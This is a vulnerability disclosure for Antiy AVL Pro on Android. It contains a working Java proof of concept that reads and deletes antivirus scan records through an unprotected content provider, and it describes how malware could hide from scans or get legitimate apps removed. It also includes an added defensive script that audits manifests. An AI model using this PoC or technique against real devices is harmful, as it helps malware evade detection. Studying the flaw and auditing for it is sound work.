An Antiy AVL Pro vulnerability lets malware go unreported or causes legitimate software to be mistakenly removed.

Source: Internet
Author: User


The Android version of Antiy AVL Pro has a vulnerability. If a virus or Trojan exploits it, the malware can escape detection by an AVL scan.

After AVL Pro scans the phone, the results are first saved to a database (db); the scan information is then read back through a content provider and shown to the user. If a virus was found, the user is prompted to delete or clean it.

The provider's URI is content://com.antiy.avlpro.MyProvider, but the provider is exported without any permission protecting it.

As a result, any APK, without requesting any special permission, can read, delete, or insert the contents of that database.

So a malicious program exploiting this vulnerability can insert constructed records to make AVL misreport and delete a normal, legitimate APK; or it can watch the db in real time (or poll it from a thread at short intervals) and, whenever its own package appears there, delete the record to avoid being removed.

PoC:

package com.ieroot.android_providerdemo;

import android.net.Uri;
import android.os.Bundle;
import android.app.Activity;
import android.content.ContentResolver;
import android.database.Cursor;
import android.view.Menu;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;

public class MainActivity extends Activity implements OnClickListener {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        TextView tView = (TextView) findViewById(R.id.result);
        tView.setText(getData());
        // add onclick listeners
        Button show = (Button) findViewById(R.id.show);
        show.setOnClickListener(this);
        Button delete = (Button) findViewById(R.id.delete);
        delete.setOnClickListener(this);
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        // Inflate the menu; this adds items to the action bar if it is present.
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }

    // Read every scan record (package name, detection name) through the exposed
    // provider. This app declares no permissions at all in its manifest.
    public String getData() {
        String avlUri = "content://com.antiy.avlpro.MyProvider";
        String resultString = "";
        ContentResolver resolver = this.getContentResolver();
        Cursor cursor = resolver.query(Uri.parse(avlUri),
                new String[]{"pkg_name", "v_name"}, null, null, null);
        if (cursor == null) {
            return resultString;
        }
        while (cursor.moveToNext()) {
            String pkg_name = cursor.getString(cursor.getColumnIndex("pkg_name"));
            String v_name = cursor.getString(cursor.getColumnIndex("v_name"));
            resultString += pkg_name + "\t" + v_name + "\n";
        }
        cursor.close();
        return resultString;
    }

    // Delete the record for one package so that AVL no longer reports it.
    public void deleteData() {
        String avlUri = "content://com.antiy.avlpro.MyProvider";
        ContentResolver resolver = this.getContentResolver();
        resolver.delete(Uri.parse(avlUri), "pkg_name = 'com.tf.thinkdroid.sg'", null);
        Toast.makeText(this, "delete is clicked", Toast.LENGTH_SHORT).show();
    }

    @Override
    public void onClick(View arg0) {
        if (arg0.getId() == R.id.show) {
            TextView tView = (TextView) findViewById(R.id.result);
            tView.setText("show : " + "\n" + getData());
        }
        if (arg0.getId() == R.id.delete) {
            deleteData();
        }
    }
}

To show the process clearly, the steps are split up and explained one by one. In real use the user sees none of this, only the outcome: a virus goes unreported, or a legitimate program is flagged and removed.

In this figure, AVL has flagged one risk. Note the package name.

Figure 1,


In this figure, the PoC program reads the contents of the db through the exposed provider.

Figure 2,

Click the Delete button to remove the record from the database.

In this figure, the db is now empty.

Figure 3,

Back in the AVL Pro interface, 0 threats are displayed:

Figure 4,


That is to say, without requesting a single permission, the PoC program has successfully altered AVL Pro's verdict.

Something to think about ~~
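The root cause above is a content provider that other packages can reach with no permission check. The following audit script is an added example, not code from the original post or from Antiy; it parses an AndroidManifest.xml and reports every provider that another app could query or modify without holding a permission. It applies the platform rule that, when android:exported is not set, a provider is exported by default only if minSdkVersion or targetSdkVersion is 16 or lower. The manifest fragments are constructed for this example (the android:name and the READ permission name are made up); only the authority com.antiy.avlpro.MyProvider comes from the page. It also shows a hardened form (android:exported="false") and a half-fix that guards reads but still leaves the PoC's delete() working.

```python
# Added example: audit <provider> elements in an Android manifest for
# permission-less exposure. Not AVL Pro's real manifest or code.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _sdk_levels(root):
    """Return (minSdkVersion, targetSdkVersion); unset values fall back to 1 / minSdk."""
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return 1, 1
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1)
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or min_sdk)
    return min_sdk, target_sdk


def audit_providers(manifest_xml):
    """One finding per <provider>: is it exported, and do reads/writes need a
    permission?  <path-permission> children are deliberately not modelled, so a
    provider relying only on them is reported as unprotected (conservative)."""
    root = ET.fromstring(manifest_xml)
    min_sdk, target_sdk = _sdk_levels(root)
    # Platform rule: with android:exported unset, a provider is exported when
    # minSdkVersion or targetSdkVersion is 16 or lower, otherwise it is not.
    legacy_default_exported = min_sdk <= 16 or target_sdk <= 16
    findings = []
    for prov in root.iter("provider"):
        exported_attr = _attr(prov, "exported")
        if exported_attr is None:
            exported = legacy_default_exported
        else:
            exported = exported_attr.strip().lower() == "true"
        general = _attr(prov, "permission")
        # readPermission / writePermission override the general permission;
        # if neither is set, that direction falls back to android:permission.
        read_perm = _attr(prov, "readPermission") or general
        write_perm = _attr(prov, "writePermission") or general
        findings.append({
            "authority": _attr(prov, "authorities"),
            "exported": exported,
            "read_protected": read_perm is not None,
            "write_protected": write_perm is not None,
        })
    return findings


def world_accessible(manifest_xml):
    """Authorities any third-party app can query or modify without a permission."""
    return [f["authority"] for f in audit_providers(manifest_xml)
            if f["exported"] and not (f["read_protected"] and f["write_protected"])]


def make_manifest(min_sdk, target_sdk, provider_attrs=""):
    """Constructed manifest fragment for the cases below (hypothetical, not Antiy's)."""
    return """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.antiy.avlpro">
  <uses-sdk android:minSdkVersion="%d" android:targetSdkVersion="%d"/>
  <application>
    <provider android:name=".MyProvider"
              android:authorities="com.antiy.avlpro.MyProvider" %s/>
  </application>
</manifest>""" % (min_sdk, target_sdk, provider_attrs)


# Weak: no android:exported and no permission on a pre-API-17 app -> world read/write.
WEAK_MANIFEST = make_manifest(8, 15)
# Hardened: the provider is only reachable from inside the AVL Pro process.
HARDENED_MANIFEST = make_manifest(8, 15, 'android:exported="false"')
# Half-fix: reads are guarded, but delete()/insert() from any app still succeed.
READ_ONLY_GUARDED = make_manifest(
    8, 15, 'android:exported="true" android:readPermission="com.antiy.avlpro.READ"')
# Same element with targetSdkVersion 17: the platform default flips to not exported.
MODERN_DEFAULT = make_manifest(17, 17)

if __name__ == "__main__":
    for label, xml in [("weak", WEAK_MANIFEST), ("hardened", HARDENED_MANIFEST),
                       ("read-guarded", READ_ONLY_GUARDED), ("api17-default", MODERN_DEFAULT)]:
        print(label, audit_providers(xml), "exposed:", world_accessible(xml))
```

Run it against a decoded manifest (for example one dumped with apktool) and treat every authority returned by world_accessible as a finding; a provider that needs to be reachable by other apps should declare a signature-level permission rather than stay open.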


The content of this page is from the Internet and does not represent Alibaba Cloud's opinion; products and services mentioned on the page have no relationship with Alibaba Cloud. If the content of the page is confusing, please write us an email and we will handle the problem within 5 days of receiving it.
